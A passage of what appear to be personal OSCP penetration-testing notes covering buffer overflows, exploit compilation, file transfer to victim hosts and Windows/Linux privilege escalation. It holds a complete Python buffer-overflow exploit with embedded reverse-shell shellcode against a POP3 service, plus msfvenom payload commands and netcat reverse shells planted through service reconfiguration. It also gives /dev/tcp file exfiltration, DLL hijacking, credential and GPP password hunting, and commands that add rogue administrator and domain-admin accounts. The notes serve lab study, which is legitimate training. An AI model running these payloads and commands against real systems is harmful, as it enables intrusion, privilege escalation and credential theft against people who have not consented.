d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff ``` 6. Record bad characters, including `0x00` as that is a null byte. Keep them in mind when finding a `JMP` location and when generating shellcode later on ## Finding a Register to Jump to Your Shellcode 1. Restart server and debugger, keeping it paused 2. Send buffer and crash the service 3. Check out the registers, find one that points to the buffer you sent, or somewhere close. In this case the register ESP points directly after the overwritten EIP 4. Right click on top-left assembly window 5. Search for > Command 6. Enter `jmp esp` 7. Ensure the address does not include bad characters 8. Record the address of the instruction ### Alternatives If no results were found in step 4, try Search for > Sequence of commands, enter the following, and use that address instead: ``` push esp retn ``` If there are still no results, try finding those commands elsewhere in the program's DLLs with Mona. 1. List all DLLs being used with `!mona modules` at the bottom of Immunity Debugger 2. Try finding a module that has nearly all security features in "False" state (Rebase, SafeSEH, ASLR, NXCompat) 3. Click on `e` in Immunity Debugger to open "Executable Modules" window 4. Locate the module and double click on it 5. Repeat steps 2-6 in the previous section to search for instructions If there are still no results, which is uncommon for complex modules, no worries. The default "Search for" function in Immunity Debugger only searches within executable regions, which is usually in the `.text` segment of the module, which can be viewed by clicking on `m` in Immunity Debugger. Notice the `R E` in the same row as the module's `.text` segment. If the program is compiled with DEP support, the `JMP ESP` would **have** to be located within `.text` segment. If it is not, fortunately you can find the instructions in non-executable segments as well. Since we can't use Immunity Debugger "Search for" function, we'll have to use Mona to find the instructions for us 1. Find the opcode for the `JMP ESP` instruction with `/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb` and type in `jmp esp`. The result is `FFE4` 2. In Immunity Debugger, type `!mona find -s "\xff\xe4" -m [module.dll]` to search for the instruction within the entire module 3. Pick a result that does not contain any bad characters in the address 4. Jump to the address location by clicking on the black "wall bang"-looking button in the Immunity Debugger toolbar, and entering the address 5. Confirm that the instructionn is `JMP ESP` 6. Record the address of the instruction ### Linux Objdump You can use Kali to find the offset of certain instructions from let's say a DLL: ```sh objdump -D -M intel user32.dll | grep 'jmp.*esp' | head ``` ## Generate Shellcode 1. Generate shellcode payload with `msfvenom -p windows/shell_reverse_tcp -a x86 --platform windows LHOST=192.168.1.23 LPORT=443 -f c -b '\x00' -e x86/shikata_ga_nai EXITFUNC=thread`, swap out with your listener IP and port, bad chars with `-b '\x00,\x0A,\x0D'` for example, etc. The `EXITFUNC=thread` ensures that only the thread serving your exploit is terminated, not the entire process by default 2. Paste in a NOP sled of about 16 `\x90`s after the overwritten EIP, and then the shellcode, and then the padding. Since the shellcode decoder is going to require some workspace in the stack (the same area where the shellcode is being stored), it will require some buffer space to avoid "stepping on its own toes". 3. Open a listener and pop the shell ## Example Final Code ```py #!/usr/bin/python import socket s = socket.socket() shellcode = ( "\xd9\xc1\xba\x8d\x2f\x0e\x1c\xd9\x74\x24\xf4\x5d\x29\xc9\xb1" "\x52\x31\x55\x17\x03\x55\x17\x83\x48\x2b\xec\xe9\xae\xdc\x72" "\x11\x4e\x1d\x13\x9b\xab\x2c\x13\xff\xb8\x1f\xa3\x8b\xec\x93" "\x48\xd9\x04\x27\x3c\xf6\x2b\x80\x8b\x20\x02\x11\xa7\x11\x05" "\x91\xba\x45\xe5\xa8\x74\x98\xe4\xed\x69\x51\xb4\xa6\xe6\xc4" "\x28\xc2\xb3\xd4\xc3\x98\x52\x5d\x30\x68\x54\x4c\xe7\xe2\x0f" "\x4e\x06\x26\x24\xc7\x10\x2b\x01\x91\xab\x9f\xfd\x20\x7d\xee" "\xfe\x8f\x40\xde\x0c\xd1\x85\xd9\xee\xa4\xff\x19\x92\xbe\xc4" "\x60\x48\x4a\xde\xc3\x1b\xec\x3a\xf5\xc8\x6b\xc9\xf9\xa5\xf8" "\x95\x1d\x3b\x2c\xae\x1a\xb0\xd3\x60\xab\x82\xf7\xa4\xf7\x51" "\x99\xfd\x5d\x37\xa6\x1d\x3e\xe8\x02\x56\xd3\xfd\x3e\x35\xbc" "\x32\x73\xc5\x3c\x5d\x04\xb6\x0e\xc2\xbe\x50\x23\x8b\x18\xa7" "\x44\xa6\xdd\x37\xbb\x49\x1e\x1e\x78\x1d\x4e\x08\xa9\x1e\x05" "\xc8\x56\xcb\x8a\x98\xf8\xa4\x6a\x48\xb9\x14\x03\x82\x36\x4a" "\x33\xad\x9c\xe3\xde\x54\x77\x06\x14\x56\x69\x7e\x28\x56\x74" "\xc4\xa5\xb0\x1c\x2a\xe0\x6b\x89\xd3\xa9\xe7\x28\x1b\x64\x82" "\x6b\x97\x8b\x73\x25\x50\xe1\x67\xd2\x90\xbc\xd5\x75\xae\x6a" "\x71\x19\x3d\xf1\x81\x54\x5e\xae\xd6\x31\x90\xa7\xb2\xaf\x8b" "\x11\xa0\x2d\x4d\x59\x60\xea\xae\x64\x69\x7f\x8a\x42\x79\xb9" "\x13\xcf\x2d\x15\x42\x99\x9b\xd3\x3c\x6b\x75\x8a\x93\x25\x11" "\x4b\xd8\xf5\x67\x54\x35\x80\x87\xe5\xe0\xd5\xb8\xca\x64\xd2" "\xc1\x36\x15\x1d\x18\xf3\x35\xfc\x88\x0e\xde\x59\x59\xb3\x83" "\x59\xb4\xf0\xbd\xd9\x3c\x89\x39\xc1\x35\x8c\x06\x45\xa6\xfc" "\x17\x20\xc8\x53\x17\x61" ) buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + '\x90' * 16 + shellcode + 'C' * (3500 - 2606 - 4 - 351 - 16) try: print 'Sending buffer...' s.connect(('192.168.1.23', 110)) s.recv(1024) s.send('USER username\r\n') s.recv(1024) s.send('PASS {}\r\n'.format(buffer)) print('Done') except: print 'Could not connect to POP3' ``` # Linux Buffer Overflows `edb --run [binary]` Double press run. To search for JMP ESP, Ctrl-O, Jump Equivalent to ESP -> EIP, select first region, Find. As per usual, find a suitable place to store the shellcode, by referring to the registers. In Crosfires case, it looks like you can't store much at the ESP, only 7 bytes, so no shellcode can be stored there. We also notice EAX points to the start of the buffer (`(setup sound ...`), so let's store the shellcode after `(setup sound `, and use those 7 bytes at ESP to be first-stage shellcode to JMP to EAX + len(`(setup sound `). Overwrite EIP > JMP to a JMP ESP > JMP ESP > ADD EAX, 12 > JMP EAX > Shellcode. Note on indirect offset jumping, `jmp esp+20` is not possible, `jmp [esp+20]` loads the value at `esp+20`, which is not intended. Instead, `lea eax, [esp+20]; jmp eax` or `sub esp, 20; jmp esp`. https://forums.offensive-security.com/showthread.php?5745-crossfire-bind-vs-reverse-shell&p=59289#post59289 Note on exploiting crossfire server, run it as a standalone, not in edb, otherwise shell will not respond to commands. https://forums.offensive-security.com/showthread.php?5745-crossfire-bind-vs-reverse-shell&p=59289#post59289 # Exploits ## Searching Exploits There are many fake exploits in the wild, many often causing harm to your system. Where can you find reliable sources for public exploit code? * Exploit Database - https://www.exploit-db.com/ * SecurityFocus - https://www.securityfocus.com/vulnerabilities In Kali, you can use `searchsploit [query]` to find exploits. Use `searchsploit -u` to pull latest updates. ## Customizing and Fixing Exploits Many exploits are one shots, meaning if they are unsuccessful, the service will crash. For that reason, never run an exploit without first examining the code and understand the inner workings. Once done, set up a small dev environment which matches the OS version and vulnerable software version, in order to test and improve existing exploits. Once we are fairly certain that our fixed exploit will work on the target machine, we can then proceed to launch it against our victim. 1. Swap the shellcode (chance that the size matters to bypass DEP and ASLR) 2. Fix the offsets (based on previous knowledge, or debugging) 3. Hardcoded variables (like server IP) Some C programs are meant to be compiled in a Windows environment, not just linux. To identify them, simply look at the includes, if "win" is in the name, is most likely for Windows. ### Linux Compilation ```sh gcc -o [elf] [.c] gcc -Wl,--hash-style=both -o [elf] [.c] # "error while loading shared libraries: requires glibc 2.5 or later dynamic linker" gcc -static -o [elf] [.c] # or this ``` Resources: * "error while loading shared libraries: requires glibc 2.5 or later dynamic linker": https://stackoverflow.com/a/12075678 ### Windows Compilation You can compile and run in Linux with mingw-w64 and wine! ```sh apt install mingw-w64 i686-w64-mingw32-gcc [.c] -o [.exe] # -lws2_32 i686-w64-mingw32-g++ [.cpp] -o [.exe] wine [.exe] ``` ### Tips * i686-w64-mingw32-gcc -lws2_32 - https://stackoverflow.com/a/2033632/4908573 * Malloc and memcpy, allocate and initialize with null bytes - https://forums.offensive-security.com/showthread.php?2363-Fixing-643-c-script&p=9453#post9453 * Adding +1 to pointers is 4 bytes - https://stackoverflow.com/a/11598369/4908573 # File Transfers Antivirus may be triggered by an upload, so be careful when transferring files. One of OffSec's favourite ways to avoid AV is to use legitimate administrative tools during post exploitation phase. ## File Transfer Methods Unix environments will often have tools such as `nc`, `curl`, `wget` preinstalled, making file transfer simple. However, on Windows, the process is not as straight forward. Most netcat-like connections provide a non-interactive shell. Interactive commands like `ftp` on Windows won't work. So we have to transfer files using non-interactive methods. ### TFTP Windows XP and 2003. Windows 7, 2008 and above will need to be explicitly added during installation. Easy, but slow speed of 2kb/sec On Kali: ```sh mkdir /tftp # DIRECTORY HOSTING FILES atftpd --daemon --port 69 /tftp ``` On Windows: ```cmd tftp -i [kali ip] get [file] ``` ### FTP All Windows. Fast speed of 206kb/sec. Scripts available in OSCP-Notes/scripts On Kali: ```sh #!/bin/bash apt update && apt install pure-ftpd groupadd ftpgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pw useradd offsec -u ftpuser -d /ftphome # use user offsec when logging into ftp pure-pw mkdb cd /etc/pure-ftpd/auth/ ln -s ../conf/PureDB 60pdb mkdir -p /ftphome # DIRECTORY HOSTING FILES chown -R ftpuser:ftpgroup /ftphome/ service pure-ftpd restart ``` On Windows: ```cmd echo open [kali ip] 21> ftp.txt echo USER offsec>> ftp.txt # username echo ftp>> ftp.txt # password echo bin>> ftp.txt # binary mode echo GET [file]>> ftp.txt echo bye>> ftp.txt ftp -v -n -s:ftp.txt # or echo open [kali ip] 21>ftp.txt&echo USER offsec>>ftp.txt&echo ftp>>ftp.txt&echo bin>>ftp.txt&echo GET [file]>>ftp.txt&echo bye>>ftp.txt&ftp -v -n -s:ftp.txt ``` ### VBScript via HTTP Windows XP, 2003 Moderate speed of 50kb/sec. Scripts available in OSCP-Notes/scripts On Kali: ```sh service apache2 start # /var/www/html # DIRECTORY HOSTING FILES ``` On Windows: ```cmd echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET", strURL, False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs cscript wget.vbs http://[kali ip]/[file] [file] ``` ### Powershell via HTTP Windows 7, 2008 and above Slow speed of 20kb/sec, but most readily available on most modern Windows OS On Kali: ```sh service apache2 start # /var/www/html # DIRECTORY HOSTING FILES # or python -m SimpleHTTPServer # current working dir will be DIRECTORY HOSTING FILES ``` On Windows: ```cmd echo $storageDir = $pwd >wget.ps1 echo $webclient = New-Object System.Net.WebClient >>wget.ps1 echo $url = "http://[kali ip]/[file]" >>wget.ps1 echo $file = "[file]" >>wget.ps1 echo $webclient.DownloadFile($url,$file) >>wget.ps1 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 ``` ### Debug.exe Older 32-bit Windows Limited to 64kb, slow speed of 3kb/sec, limited to the connection speed of the shell On Kali: ``` upx -9 [.exe] # pack and compress a binary you wanna transfer ls -lah [.exe] # check whether it is less than 64kb exe2hex [.exe] # alternatively, `wine /usr/share/windows-binaries/exe2bat.exe [.exe] [.bat]` cat [.bat] | xclip -selection c # if remotely accessing kali, use `ssh -X`, a bit finicky though ``` On Windows: ``` # paste ``` ### `nc.exe` Requires `nc.exe` to be already transferred. Allows for two-way transfers. ```cmd C:\nc.exe -lvp 4444 > [file] # on Windows nc [windows ip] 4444 < [file] # on Kali ``` Vice versa. ### Linux Dev TCP ``` cat file.txt > /dev/tcp/192.168.1.23/4444 # on victim linux nc -lvp 4444 > file.txt # on Kali ``` # Privilege Escalation ## Kernel Exploits ### Linux Kernel Exploits * Linux Kernel 2.6.39 - 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation: * https://www.exploit-db.com/exploits/18411/ * https://www.securityfocus.com/bid/51625/info * CVE-2012-0056 * Linux Kernel 2.6.22 - 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method): * https://www.exploit-db.com/exploits/40616/ * CVE-2016-5195 * Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation * https://www.exploit-db.com/exploits/3/ * http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c * CVE-2003-0127 * Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV below 1.4.1 - Local Privilege Escalation (1) * https://www.exploit-db.com/exploits/8478/ * `exploit/linux/local/udev_netlink` Tools: * https://github.com/sleventyeleven/linuxprivchecker * https://github.com/InteliSecureLabs/Linux_Exploit_Suggester * https://github.com/jondonas/linux-exploit-suggester-2 ### Windows Kernel Exploits #### PoC Exploits * 'afd.sys' Local Privilege Escalation * Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046) * https://www.exploit-db.com/exploits/40564/ * Windows XP, 2003, 7, 2008, Vista * Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080) * https://www.exploit-db.com/exploits/18176/ * CVE-2011-2005 * And a lot more * KiTrap0D/vdmallowed.exe * https://www.exploit-db.com/exploits/11199/ * Upload both `vdmallowed.exe` and `vdexploit.dll`. May only work on GUI. * CVE-2010-0232 * RID Hijacking (Metasploit) * https://www.rapid7.com/db/modules/post/windows/manage/rid_hijack * http://csl.com.co/rid-hijacking/ * And many more ... just search `[OS] privilege escalation` on Google. Eg. `Windows 7 SP1 privilege escalation` or `Windows 7 SP1 x86 privilege escalation` To compile C/C++ Windows exploit on Linux: * `i686-w64-mingw32-gcc [.c] -o [.exe] [-lws2_32]` * `i686-w64-mingw32-g++ [.cpp] -o [.exe] [-lws2_32]` To compile Python exploit on Windows: 1. On Windows, install PyWin32 2. Download and extract Pyinstaller 3. Open cmd and cd into Pyinstaller 4. `python pyinstaller.py --onefile [.py]` Note: Pywin32 installation error: https://stackoverflow.com/a/21081675/4908573 Resources: * Precompiled Windows Kernel Exploits: https://github.com/SecWiki/windows-kernel-exploits Tools: * Windows Exploit Suggester: https://github.com/GDSSecurity/Windows-Exploit-Suggester * `systeminfo` * `wmic qfe get Caption,Description,HotFixID,InstalledOn` * Metasploit Module: `post/multi/recon/local_exploit_suggester` ## Configuration Issues ### Linux Configuration Issues What's the OS? What version? What architecture? * `cat /etc/*-release` * `uname -i` * `lsb_release -a` (Debian based OSs) Who are we? Where are we? * `id` * `pwd` Who uses the box? What users? (And which ones have a valid shell) * `cat /etc/passwd` * `grep -vE "nologin|false" /etc/passwd` What's currently running on the box? What active network services are there? * `ps aux` * `netstat -antup` What's installed? What kernel is being used? * `dpkg -l` (Debian based OSs) * `rpm -qa` (CentOS / openSUSE) * `uname -a` Much more at: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ * SUID Files * `find / -perm -4000 -type f -ls 2> /dev/null` find SUID files that are potentially vulnerable (outdated nmap w/ interactive mode, scripts that give you effective root immediately) * `find / \( -perm -2003 -o -perm -4003 \) -type f -ls 2> /dev/null` find SUID/SGID files that are both writable and executable (if you are lucky) * `find / -perm -002 -type f -ls 2> /dev/null | grep cron` find writable cron files (and use it to open a reverse shell) Writable `/etc/passwd` or `/etc/shadow` * Writable `/etc/passwd`, write password generated from `openssl passwd [password]` to `root:[here]:0:0:root:/root:/bin/bash`, then login as root using the password. Find writable tmp folders to do work in: ```sh mount | grep /tmp # check if tmp is mounted differently cd /tmp # or cd /var/tmp ``` Are you a sudo user already? Do you have access to powerful commands like chown or chmod? ```sh sudo -l sudo su - ``` Are you part of the sudo group, but not in the sudoers file? ```sh id # 27(sudo) pkexec sh ``` No TTY or PTY, non-interactive? ("no tty present and no askpass program specified") Spawn one: ```sh python -c 'import pty;pty.spawn("/bin/bash")' ``` Errors about missing files while compiling with gcc? ("gcc: error trying to exec 'cc1': execvp: No such file or directory") Export PATH: ```sh export PATH=$PATH ``` Resources: * https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ * https://payatu.com/guide-linux-privilege-escalation/ * http://www.dankalia.com/tutor/01005/0100501004.htm * Shell Escape Sequences * `vi` * `emacs` * `find` * `awk` * `perl` * `man` * `nmap` * IFS Exploit * LD_PRELOAD Exploit * Abusing users with `.` in their PATH (requires interaction) * Symlinks (requires interaction) * https://www.pentestpartners.com/security-blog/exploiting-suid-executables/ * Simple PATH SUID Privilege Escalation * https://unix.stackexchange.com/questions/364/allow-setuid-on-shell-scripts?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa * SUID is ignored on all interpreted (shebang `#!`) executables Tools: * https://github.com/sleventyeleven/linuxprivchecker * https://github.com/rebootuser/LinEnum #### SUID Privilege Escalation Note: `setuid` bit simply allows a script to set the `uid`. The script still needs to call `setuid()` or `setreuid()` to run in the the real uid or effective uid respectively. Without calling `setuid()` or `setreuid()`, the script will still run as the user who invoked the script: https://stackoverflow.com/a/20687988/4908573 Ensure to use "PrependSetuid=true" when generating a binary that is going to be directly used in SUID privilege escalation: ```sh msfvenom -p linux/x86/exec cmd=/bin/bash PrependSetuid=true -f elf -o shell ``` Resources: * https://twitter.com/mubix/status/2049242113777664 * http://linux4dummy.blogspot.sg/2012/05/creating-basic-backdoor-for-linux.html Or instead of using an "exec" binary to give you a shell, manually setuid in C, compile, run: ```sh echo -e '#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c sudo chown root:root /tmp/setuid sudo chmod 4755 /tmp/setuid /tmp/setuid ``` ##### Simple PATH SUID Privilege Escalation ``` # On Victim bob@sufferance:~$ ls -l /usr/local/bin/uploadtosecure -rwsr-xr-x 1 root root 6923 2008-10-07 19:38 /usr/local/bin/uploadtosecure bob@sufferance:~$ strings /usr/local/bin/uploadtosecure puts system ... Archiving files to secure server... scp -r file/tobesecured/* 10.192.168.1.23:/var/www/html/files/ # On Kali msfvenom -p linux/x86/exec CMD=/bin/sh -f elf -o scp # On Victim wget 192.168.1.23/scp -O /tmp/scp # transfer the exec binary over to Sufferance chmod 755 /tmp/scp export PATH=/tmp:$PATH /usr/local/bin/uploadtosecure # it'll now call our "special" scp binary in /tmp instead whoami ``` ##### Bypass Absolute Binary Paths with IFS If the binary being called is absolute (eg. `/usr/bin/scp`), you can export `IFS=/`. The SUID binary will now execute `usr bin scp`. Drop a `usr` binary into `/tmp` and add it to PATH. ### Windows Configuration Issues Great Resources: * https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html * https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ * And more listed in the examples below #### Weak Service Permissions NOTE: Hi-priv shell sessions that are created through weak services will die quickly, like in 20-30 sec, make sure to migrate (Meterpreter) to a new process, or start a create a new process by opening another shell with nc.exe ##### Insecure File/Folder Permissions with `wmic` and `icacls` Use `icacls [.exe]` to check for insecure permissions such as `Everyone:(I)(F)` within service executables (within `services.msc`), and then with a non-privileged user, replace that file with a malicious file. Automatically find weak service file permissions with the following: ```cmd for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> services.txt for /f eol^=^"^ delims^=^" %a in (services.txt) do cmd.exe /c icacls "%a" >> permissions.txt # look for `Everyone:(...)(F)`, `BUILTIN\Users:(...)(F)`, `NT AUTHORITY\Authenticated Users:(...)(M)`, `NT AUTHORITY\Authenticated Users:(...)(C)`, `[Computer]\[Your User]:(...)(F)` in permissions.txt. transfer it out to kali if needed, as it it'll be easier to search ``` Upload a reverse shell executable and replace the original service executable with the malicious one with `copy useradd.exe C:\the\path\to\service\binary.exe`. The next time the service is started, the malicious executable will run with SYSTEM privileges. Tools: * `icacls` Alternatively, make the current low-priv user an Administrator. Prepare a malicious executable to give bob administrative rights on Kali: ```c #include <stdlib.h> int main() { int i; i = system("net localgroup administrators bob /add"); return i; } ``` Compile it to an executable using mingw32: `i686-w64-mingw32-gcc -o useradd.exe useradd.c` Resources: * http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/ * https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ * https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html ##### Insecure Service Permissions with `accesschk.exe` and `sc` ```cmd accesschk.exe -accepteula accesschk.exe -uwcqv "Everyone" * accesschk.exe -uwcqv "Authenticated Users" * accesschk.exe -uwcqv "Users" * # find a service that returns `SERVICE_ALL_ACCESS`. sc qc Apache # query the service to check whether it runs as system, it's binary path, etc. sc config Apache binPath= "C:\Windows\TEMP\nc.exe 192.168.1.23 4444 -e cmd.exe" # or "net localgroup administrators bob /add" sc config Apache obj= ".\LocalSystem" password= "" # this makes the service run as SYSTEM. do this for services that has smth other than LocalSystem in SERVICE_START_NAME sc config Apache start= demand # this allows a service to be started. do this if a service is disabled # restart service ``` Windows XP SP0 & SP1 UPNP (upnphost) and SSDP Discovery (ssdpsrv) Services have insecure service permission. They allow "Authenticated Users" to modify the services. It can be used as a universal local privilege escalation vulnerability. Note, upnphost requires ssdpsrv to start first. Tools: * `accesschk.exe` * `sc` * Metasploit Module: `exploit/windows/local/service_permissions` Resources: * http://www.fuzzysecurity.com/tutorials/16.html * https://pentestlab.blog/2017/03/30/weak-service-permissions/ * https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/ * Enable a disabled service with sc, other options here as well: http://www.itprotoday.com/management-mobility/how-can-i-configure-services-start-type-command-line * UPNP (upnphost) requires SSDP Discovery (ssdpsrv) to start: https://www.pcreview.co.uk/threads/upnp-service-not-starting.2694748/ * SSDP Discovery service name is ssdpsrv: https://computerstepbystep.com/ssdp_discovery_service.html ##### Unquoted Services Find services that are unquoted: ```cmd wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ ``` When Windows attempts to run these services, it will look at the following paths in order and run the first executable that it finds. Just imagine splitting the string with a space: ``` # C:\Program Files (x86)\Program Folder\A Subfolder\Another Subfolder\Executable.exe C:\Program.exe C:\Program Files.exe C:\Program Files (x86)\Program.exe C:\Program Files (x86)\Program Folder\A.exe C:\Program Files (x86)\Program Folder\A Subfolder\Another.exe C:\Program Files (x86)\Program Folder\A Subfolder\Another Subfolder\Executable.exe ``` ```cmd icacls "C:\Program Files (x86)\Program Folder\A Subfolder" # look for `Everyone:(...)(F)`, `BUILTIN\Users:(...)(F)`, `NT AUTHORITY\Authenticated Users:(...)(M)`, `NT AUTHORITY\Authenticated Users:(...)(C)`, or `[Computer]\[Your User]:(...)(F)` to check if you are able to write that directory # drop a malicious executable at "C:\Program Files (x86)\Program Folder\A Subfolder\Another.exe" that spawns a shell # restart service ``` Tools: * `wmic service` * `icacls` * Metasploit Module: `exploit/windows/local/trusted_service_path` Reference: * https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ * https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html #### AlwaysInstallElevated ```cmd # On Windows: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated # if key is found, the following is produced: # HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer # AlwaysInstallElevated REG_DWORD 0x1 # if not found: # ERROR: The system was unable to find the specified registry key or value. # On Kali, generate a msi that will call a reverse shell msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai LHOST=[kali ip] LPORT=[port] -f exe -o payload.exe msfvenom -p windows/exec cmd="C:\Users\bob\AppData\Local\Temp\Payload.exe" -f msi-nouac -o shell.msi # transfer both to "C:\Users\bob\AppData\Local\Temp\" # On Windows: msiexec /quiet /qn /i "C:\Users\bob\AppData\Local\Temp\malicious.msi" # /quiet - Suppress messages to the user, /qn - no gui, /i - regular (vs administrative) installation ``` Tools: * Metasploit Module: `exploit/windows/local/always_install_elevated` Resources: * https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ * https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html #### DLL Hijacking Order in which Windows finds a DLL: 1. The directory from which the application loaded 2. 32-bit System directory (C:\Windows\System32) 3. 16-bit System directory (C:\Windows\System) 4. Windows directory (C:\Windows) 5. The current working directory (CWD) 6. Directories in the PATH environment variable (system then user) Sometimes, a DLL does not exist on the machine. As a low privilege user we have little hope of putting a malicious DLL in 1-4, 5 is not a possibility in this case because we are talking about a Windows service but if we have write access to any of the directories in the Windows PATH we win. We'll need 2 things, a writable file/folder in %PATH% ("C:\Python27"), and a vulnerable service/application that has missing DLLs (IKEEXT): ```cmd echo %path% # Find a non-default directory in "C:\", it will give write access to authenticated users. cacls "C:\Python27" msfvenom -p windows/shell_reverse_tcp lhost=[kali ip] lport=[port] -f dll -o shell.dll # on Kali copy shell.dll C:\Python27\wlbsctrl.dll # restart IKEEXT service ``` Resources: * http://www.fuzzysecurity.com/tutorials/16.html * https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ * ExploitDB: https://www.exploit-db.com/dll-hijacking-vulnerable-applications/ * `searchsploit [program] dll`. Find ones that has "DLL Hijacking" in the name #### Task Scheduler Weak File/Folder Permissions ```cmd schtasks /query /fo LIST /v # Look at the "Task To Run" within the task list. Eg: E:\GrabLogs\tftp.exe 10.1.1.99 GET ... cacls "E:\GrabLogs" # If Authenticated Users or Users or equivalent has modify permissions, simply replace the binary within with a reverse shell copy shell.exe E:\GrabLogs\tftp.exe ``` #### Stored Credentials ```cmd dir c:\*pass*.txt /s /b dir c:\*vnc.ini /s /b /c dir c:\*ultravnc.ini /s /b /c dir c:\ /s /b /c | findstr /si *vnc.ini findstr /si password *.txt | *.xml | *.ini findstr /si pass *.txt | *.xml | *.ini type C:\unattend.xml type C:\sysprep.inf type C:\sysprep\sysprep.xml ``` Retrieving credentials stored within GPP files from Domain Controller: ```cmd net use z: \\dc01\SYSVOL # whr dc01 is the Domain Controller cd C:\Windows\SYSVOL # or cd in, if you are the Domain Controller already dir /s Groups.xml findstr -si cpassword C:\..\Groups.xml # within Groups.xml file, find "cpassword", then gpp-decrypt them on kali ``` #### Administrator to SYSTEM (Not Required) (Not an Issue) ##### Task Scheduler This method only works on a Windows 2000, XP, or 2003 machine. And this requires local administrator access. Creates a high-priv shell using task scheduler. ```cmd time # set the following to 1min after current time at 01:23 /interactive "C:\shell.exe" # to open reverse shell at 01:23 /interactive cmd.exe # to open cmd with System privileges, only works when you have GUI ``` Resources: * https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ ###### Reconfigure a Service Refer to Insecure Service Permissions. #### Useful Cmd Commands Restarting a Windows service methods: ```cmd sc query Apache # check service status sc stop Apache && sc start Apache net stop Apache && net start Apache wmic service Apache call startservice shutdown /r /t 0 # last resort, reboot, or just wait for user to reboot ``` Preparation of adding a non-privileged user and allowing remote desktop connection: ```cmd net user bob bob /add net localgroup "Remote Desktop Users" bob /add # runas /user:bob cmd.exe # to use a shell instead of remote connection ``` Adding user to local administrators group: ```cmd net localgroup administrators bob /add ``` Creating a Domain Admin user and login to other servers within the domain. By default, Domain Admins group is part of every server's local Administrator group within the domain. ```cmd net user testing 1qwer$#@! /add /domain net group "Domain Admins" testing /add /domain # rdesktop -u '[domain]\testing' -p '1qwer$#@!' [ip of server part of domain] # on kali # Start > Right-Click Command Prompt > Run as Administrator # Even as a domain admin, you'll have to manually open cmd as admin because of UAC. (https://blogs.msdn.microsoft.com/patricka/2010/05/13/if-im-an-administrator-why-do-i-get-access-denied/) ``` Connecting using RDP (TCP Port 3389) on Kali. Do note, if password is wrong, `xfreerdp` will return error code `0x20009`, note if password is correct however server disables local logins, `xfreerdp` will open the session, but within the session, it'll say "The user name or password is incorrect". Meaning that your passwords may be correct, even if RDP isn't allowed. ```sh rdesktop -u Administrator -p abc123 192.168.1.23 rdesktop -u 'thinc\testing' -p '1qwer$#@!' 192.168.1.23 # where thinc is the domain. if thinc doesn't work, try thinc.local xfreerdp /u:testing /d:thinc /p:'1qwer$#@!' /v:192.168.1.23 xfreerdp /u:testing /d:thinc 